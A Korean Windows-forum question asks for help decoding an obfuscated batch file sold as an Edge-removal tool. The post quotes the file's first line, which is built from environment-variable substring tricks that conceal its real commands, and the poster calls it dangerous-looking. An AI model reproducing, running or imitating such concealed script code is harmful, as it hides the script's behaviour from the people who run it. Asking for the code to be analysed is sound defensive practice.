질문과 답변

윈 도 우 난독화된 cmd 파일 해석을 부탁드립니다

2022.11.10 03:58

ViArPl 조회:1017

https://windowsforum.kr/gallery/18666267

 

덧글에 글쓴이 분께서 cmd 파일을 올리셨는데, 받아서 열여보니 난독화가 되어 있습니다.

 

첫째 줄의 내용만 보면 대충 이러한데, 읽을 수가 없네요.

 

@%os:~6,1%%comspec:~26,1%%comspec:~-13,1%%programfiles:~10,1%'=^">%commonprogramfiles:~-7,1%u%commonprogramfiles:~-3,1%&@%programfiles:~-1,1%%comspec:~-12,1%%comspec:~-13,1%%commonprogramfiles:~23,1%%comspec:~14,1%%pathext:~41,1%=%pathext:~47,1%%programfiles:~-9,1%%pathext:~1,1%U&@%os:~6,1%%comspec:~15,1%%comspec:~14,1%%commonprogramfiles:~10,1%%programfiles:~13,1%%pathext:~26,1%%commonprogramfiles:~-22,1%L=%pathext:~31,1%Z%pathext:~32,1%&@%programfiles:~14,1%%comspec:~20,1%h%commonprogramfiles:~21,1%%commonprogramfiles:~-19,1%%os:~-6,1%ff&@%os:~-4,1%%comspec:~26,1%%comspec:~-13,1%%commonprogramfiles:~10,1%'=^^^\^^^%pathext:~7,1%f%commonprogramfiles:~22,1%^^^&^^^%pathext:~47,1%^^^Q^^^'^^^}^^^%pathext:~18,1%v^^^4^^^)%comspec:~-12,1%^^^^%comspec:~20,1%^^^%commonprogramfiles:~-12,1%^^^%comspec:~-9,1%^^^U^^^;^^^/^^^%pathext:~17,1%^^^$%os:~-9,1%k^^^=^^^6q^^^R^^^*%comspec:~25,1%^^^I^^^%programfiles:~-13,1%^^^{^^^Y^^^"%commonprogramfiles:~5,1%^^^Z^^^%pathext:~42,1%^^^1^^^,^^^Gbu^^^%pathext:~27,1%^^^<%commonprogramfiles:~9,1%%commonprogramfiles:~28,1%^^^%pathext:~12,1%^^^.^^^_^^^9%programfiles:~7,1%z^^^L%programfiles:~6,1%p^^^(^^^%os:~-2,1%^^^%pathext:~26,1%^^^~^^^>^^^?^^^:^^^%programfiles:~-6,1%j^^^`^^^+^^^%comspec:~-10,1%^^^-^^^#^^^%pathext:~2,1%^^^K^^^|h%os:~3,1%^^^8%commonprogramfiles:~13,1%^^^0^^^%pathext:~35,1%^^^]^^^5^^^[^^^7%comspec:~-15,1%^^^%pathext:~37,1%%comspec:~14,1%%os:~5,1%^^^%pathext:~36,1%%programfiles:~-8,1%^^^%pathext:~40,1%^^^@^^^%os:~-1,1%&@%programfiles:~-1,1%%commonprogramfiles:~27,1%%comspec:~-13,1%%commonprogramfiles:~13,1%%commonprogramfiles:~-24,1%%comspec:~-7,1%%programfiles:~-8,1%%commonprogramfiles:~-3,1%%commonprogramfiles:~-19,1%%comspec:~-3,1%%os:~2,1%%commonprogramfiles:~-21,1%b%commonprogramfiles:~13,1%%comspec:~15,1%%comspec:~22,1%%commonprogramfiles:~-2,1%%commonprogramfiles:~13,1%%programfiles:~-8,1%%comspec:~12,1%%programfiles:~14,1%%comspec:~-5,1%%comspec:~15,1%%comspec:~25,1%p%programfiles:~8,1%%commonprogramfiles:~22,1%%commonprogramfiles:~28,1%%commonprogramfiles:~12,1%%commonprogramfiles:~5,1%%commonprogramfiles:~22,1%&%comspec:~-1,1%%os:~2,1%%comspec:~-5,1%%programfiles:~13,1%%comspec:~-7,1%%programfiles:~-11,1%%programfiles:~8,1%%commonprogramfiles:~13,1%%commonprogramfiles:~10,1%%comspec:~18,1%>%os:~-8,1%u%commonprogramfiles:~-3,1%&&@%programfiles:~15,1%%comspec:~15,1%%comspec:~-13,1%%programfiles:~-6,1%%pathext:~35,1%%os:~3,1%%pathext:~12,1%%os:~-5,1%%os:~5,1%=f%pathext:~11,1%%pathext:~12,1%%pathext:~35,1%%comspec:~14,1%&@%commonprogramfiles:~28,1%%comspec:~-12,1%%comspec:~-13,1%%commonprogramfiles:~-19,1%p%commonprogramfiles:~22,1%=%pathext:~2,1%%pathext:~2,1%%os:~-5,1%%commonprogramfiles:~-18,1%&@%programfiles:~-2,1%%comspec:~20,1%h%commonprogramfiles:~-24,1%.>%0 &&@%commonprogramfiles:~-1,1%%comspec:~-12,1%%comspec:~-13,1%%programfiles:~10,1%%commonprogramfiles:~28,1%f%comspec:~-24,1%%programfiles:~-13,1%=%os:~-8,1%%pathext:~8,1%&@%os:~6,1%%comspec:~24,1%%comspec:~-13,1%%commonprogramfiles:~23,1%Z%pathext:~18,1%%pathext:~26,1%%comspec:~-15,1%%pathext:~2,1%=p%pathext:~31,1%&@%commonprogramfiles:~28,1%%commonprogramfiles:~-15,1%%comspec:~14,1%%programfiles:~10,1%%os:~-4,1%%commonprogramfiles:~11,1%%os:~2,1%=%pathext:~45,1%Z%pathext:~13,1%%comspec:~14,1%%os:~5,1%&@%comspec:~-16,1%hu%comspec:~14,1%%os:~3,1%%commonprogramfiles:~-24,1%%os:~5,1%%os:~-8,1%%commonprogramfiles:~10,1%/%comspec:~-16,1%%programfiles:~-6,1%/f%commonprogramfiles:~10,1%/%comspec:~-13,1%%commonprogramfiles:~10,1%0&&@%comspec:~-12,1%%comspec:~25,1%%programfiles:~12,1%%comspec:~14,1%&&@%comspec:~26,1%%comspec:~20,1%h%commonprogramfiles:~21,1%%commonprogramfiles:~-19,1%"

 

난독화가 되어 있는 연유는 모르겠지만, 최근 이러한 일이 있었던 만큼, 이러한 난독화는 겉보기에 상당히 위험해보입니다. 이 스크립트가 무엇을 하는지 전혀 알 수 없으니까요.

 

Microsoft Edge Clean.cmd

 

덧글에 있던 파일을 그대로 올려봅니다. 대체 어떤 방식으로 MS Edge가 제거되는 것인지 궁금하네요.

번호 제목 글쓴이 조회 등록일
[공지] 질문과 답변 게시판 이용간 유의사항 gooddew - -
95398 소프트웨어| 문서 폴더를 다른 폴더열기로 바꿀 수 있나요? [1] brucex 243 11-27
95397 윈 도 우| http 404 error / https 관련 [1] choibro045 234 11-27
95396 윈 도 우| 여러대 윈도우 바탕화면 아이콘 위치를 똑같이 하고 싶은데... [1] 건스 381 11-27
95395 윈 도 우| 시작프로그램 추가하는 레지스트리 위치 3개 차이점이 뭔가요? [2] 건스 690 11-26
95394 하드웨어| 이친구 이름이 정확이 뭘까요??? [7] 하나로탑 1220 11-26
95393 소프트웨어| 한글에서 안 지워지는 배경그림 (?) [6] 현민지 1090 11-26
95392 윈 도 우| Pe 부팅 설치시 unmountable volume 뜨시는분 계신가요? [1] 아킬레스님 286 11-26
95391 윈 도 우| 문의)) "레노버 아이디어패드 100s-14IBR N3710"... [4] chobits 643 11-26
95390 소프트웨어| 엑셀에서 1개 행을 복사하여 한번에 원하는만큼 붙여넣는 ... [5] 『ⓖⓤⓝ』 776 11-26
95389 소프트웨어| 파일 폴더를 만들면서 자동으로 이동복사 하는 TOOL 은 없... [4] 한아름 427 11-26
95388 윈 도 우| 바탕화면 아이콘 생성막기 [6] 마루나래 526 11-26
95387 소프트웨어| Macrium Reflect [2] 수담 490 11-26
95386 윈 도 우| 필수 폴더 이동 방법 [1] 마루나래 593 11-25
95385 윈 도 우| 문의)) 이 노트북 드라이버를 찾을 수가 없네요......ㅠ.ㅠ [11] chobits 755 11-25
95384 소프트웨어| Shadow defender 쉐도우 디펜더 무한 부팅 [1] Win10적응중 573 11-25
95383 소프트웨어| (오피스 365) 엑셀에서 "카메라"기능이 안됩니다. [2] 파란하늘촌 802 11-25
95382 윈 도 우| 혹시 윈도우 시스템 파일 압축 프로그램이 있을까요?? [4] 청정골 447 11-25
95381 소프트웨어| Zoom 관련 문의입니다. [2] 파란하늘촌 291 11-25
95380 기 타| 이거 제품 이름 좀 알려 주세요 [2] 줄넘기 510 11-25
95379 윈 도 우| 파일들을 일괄적으로 사용권한 변경할 수 있을까요? [6] 그섬 276 11-25
XE1.11.6 Layout1.4.8